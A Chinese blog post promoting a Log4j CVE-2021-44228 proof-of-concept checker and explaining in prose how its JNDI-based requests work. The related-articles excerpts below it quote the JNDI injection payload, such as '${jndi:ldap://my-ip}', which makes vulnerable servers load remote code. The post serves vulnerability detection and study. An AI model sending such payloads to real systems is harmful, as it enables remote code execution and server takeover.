探索Apache Log4j RCE POC:一款强大的安全检测工具

于 2024-04-21 09:40:22 发布
阅读量438 收藏 5
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00066/article/details/138023790
版权

探索Apache Log4j RCE POC:一款强大的安全检测工具

项目地址:https://gitcode.com/xiajun325/apache-log4j-rce-poc

Project Link

在网络安全领域,漏洞检测和预防是至关重要的。这个项目——apache-log4j-rce-poc,是一个针对著名Apache Log4j 2.x框架的远程代码执行(RCE)漏洞的验证工具。它的目标是帮助开发者、系统管理员和安全专家识别和修复Log4j的安全隐患。

项目简介

Apache Log4j 是一个广泛使用的Java日志库,但在2021年发现了一个严重的安全漏洞(CVE-2021-44228),允许攻击者通过控制台注入恶意代码并执行任意命令。此PoC(Proof of Concept)项目由xiajun325开发,它提供了自动检测该漏洞的方法,对于防范此类攻击非常有用。

技术分析

apache-log4j-rce-poc 使用Java编写,利用了Log4j的日志格式化特性来触发RCE漏洞。它的工作原理如下:

  1. 请求构造:生成包含特定JNDI(Java Naming and Directory Interface)引用的HTTP请求。
  2. 漏洞触发:如果目标系统中的Log4j未正确更新或配置,这些请求将触发日志解析器尝试解析JNDI引用,从而可能执行攻击者提供的恶意代码。
  3. 结果反馈:根据响应状态码或响应内容,PoC工具判断目标是否易受攻击,并给出相应提示。

应用场景

这款工具主要适用于以下情况:

  • 安全审计:对内部网络或公开服务器进行安全扫描,确定哪些系统受Log4j漏洞影响。
  • 应急响应:在得知新的Log4j漏洞后,迅速评估现有环境的风险。
  • 教育与研究:了解如何利用和防止这种类型的漏洞,提高安全意识和防御能力。

特点

  1. 简洁高效:代码量小,易于理解和部署。
  2. 自动化测试:一键式运行,无需人工干预。
  3. 可定制性:可以轻松调整请求参数以适应不同环境和需求。
  4. 开源社区支持:持续更新,以应对Log4j的新漏洞。

小结

apache-log4j-rce-poc 是一个强大而实用的安全工具,能够帮助你及时发现并解决Log4j相关的安全问题。如果你管理着使用Log4j的日志系统,或者想要了解更多信息安全的实战应用,这个项目绝对值得你尝试。立即访问项目页面开始探索吧!

项目地址:https://gitcode.com/xiajun325/apache-log4j-rce-poc

瞿旺晟
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
apache-log4j-poc-main.zip
12-16
APACHE log4j poc
log4j_trunctate_poc:poc 测试如何截断堆栈跟踪
06-05
log4j_trunctate_poc poc 测试如何截断堆栈跟踪 介绍 Log4j 从 1.2.16 开始附带一个EnhancedPatternLayout类。 EnhancedPatternLayout能够截断堆栈跟踪消息,因此它们不会填满日志文件。 要启用此功能,对于每个输出,您需要修改从PatternLayout到EnhancedPatternLayout switch,并向ConversionPattern添加一个额外的标志。 作为一个例子改变这个: log4j.appender.CONSOLE.layout=org.apache.log4j.EnhancedPatternLayout log4j.appender.CONSOLE.layout.ConversionPattern=%-4r [%t] %-5p %c %x \u2013 %m%n %throwable
Apache Log4j2 RCE漏洞复现(CVE-2021-44228)
siu~
10-31 423
Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过 该漏洞构造特殊的数据请求包,最终触发远程代码执行。
Struts2 CVE-2021-44228 log4j POC
不光要学,知识要能说出口
12-28 2795
随着log4j漏洞的出现,众多框架受到影响,大家都在研究不同框架的利用点在何处,下面总结的是Struts2目前的poc
Apache Log4j2 RCE 远程命令执行漏洞复现与分析
angry_program的博客
12-18 6448
Apache Log4j2 远程代码执行漏洞。由于Log4j2 组件在处理程序日志记录时存在JNDI 注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2 组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。本文主要复现漏洞过程和研究漏洞原理。
LOG4J RCE 漏洞分享与自查.pdf
12-15
Log4j RCE 漏洞是近期爆发的一种高危漏洞,它影响了全球许多业务线,原因在于引入的 Log4j2 2.10.0 版本中存在的漏洞。本文将详细介绍 Log4j RCE 漏洞的成因、漏洞复现、检测方法和解决方案。 漏洞原因: Log4j ...
Apache Log4j2 RCE.md
07-09
Apache Log4j2 RCE
Log4j2 RCE漏洞分析
03-14
记录一下log4j2 RCE的原理
log4j2_rce 项目
02-23
这是存在log4j jndi注入的项目,可以用idea编译,用网上工具复现一遍
f5_rce_poc:cve-2021-22986 f5 rce扩展批量检测poc
03-25
python3 f5_rce.py -u 指定目标URL -f 批量检测文件 -c 执行命令 效果如下所示: PS:输出不够美感,我会修改的 :beaming_face_with_smiling_eyes: 问题 该POC目前只能支持部分命令,执行history , ls等失败,原因...
log4j漏洞原理及攻击流程
weixin_54603520的博客
05-14 2290
log4j漏洞最早出现在2021年11月24日一位阿里安全团队的员工发现的,上报到Apache之后,12月10日凌晨才被公开。该漏洞威胁等级较高。基本比肩与阿里当年的fastjson漏洞。
Log4j远程代码执行漏洞(CVE-2021-44228)漏洞复现
鸥鹭忘机
12-11 1万+
基本信息 漏洞编号:CVE-2021-44228 影响版本:2.x<=2.15.0-rc1 poc地址:https://gitee.com/lcosmos/apache-log4j-poc 在此十分感谢我的寝室长Cosmos提供的poc和技术支持。 原理简述 当log4j打印的日志内容中包含${jndi:ldap://my-ip}时,程序就会通过ldap协议访问my-ip这个地址,然后my-ip就会返回一个包含java代码的class文件的地址,然后程序再通过返回的地址下载class文件并执行。 漏洞
Apache_Log4j2_RCE漏洞复现(CVE-2021-44228)
qq_45751902的博客
10-05 793
这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:{sys:java.version}}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意的Class的加载执行(可执行任意后台指令),从而达到攻击的目的。是最受欢迎的于开发时的日志组件。不知道为什么,上面申请的那个url,没有返回数据,然后也ping不通(如果你还没有回显,看图片下面),看下面的图片,说明存在漏洞。
Log4j远程代码执行漏洞
派大星的博客
09-21 2528
Log4j远程执行漏洞原理分析
apache log4j漏洞复现
热门推荐
Shanfenglan's blog
12-10 5万+
文章目录1. Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)利用条件利用2. CVE-2019-17571利用条件利用3. apache log4j rce利用条件环境搭建利用 1. Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645) Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。 利用条件
探索Log4j Shell POC:一强大安全漏洞检测工具
最新发布
gitblog_00040的博客
03-24 392
探索Log4j Shell POC:一强大安全漏洞检测工具 项目地址:https://gitcode.com/kozmer/log4j-shell-poc 在这个数字化时代,软件的安全性是不可忽视的重要问题。近期,Apache Log4j框架的一个严重漏洞(CVE-2021-44228)引起广泛关注,它允许恶意攻击者执行远程代码,对系统造成极大威胁。为应对这一挑战,开发者社区迅速行动起来,其...
Apache_Log4j2_RCE漏洞复现
Nailaoyyds的博客
04-24 4263
漏洞描述: Apache Log4j2 是一开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。 影响范围: Apache Log4j 2.x < 2.15.0-rc2 利用bugku中的题来
Apache Log4j2 RCE漏洞利用反弹shell合集
good good study
03-10 1万+
Apache Log4j2 是一开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
bugku apache log4j2 rce
03-16
bugku apache log4j2 rce是指一个漏洞,可以通过Apache Log4j2库中的一个特定功能,实现远程代码执行(RCE)攻击。该漏洞可能会导致攻击者获取系统权限,进而对受害者进行攻击和控制。建议用户及时升级相关软件版本...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

瞿旺晟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值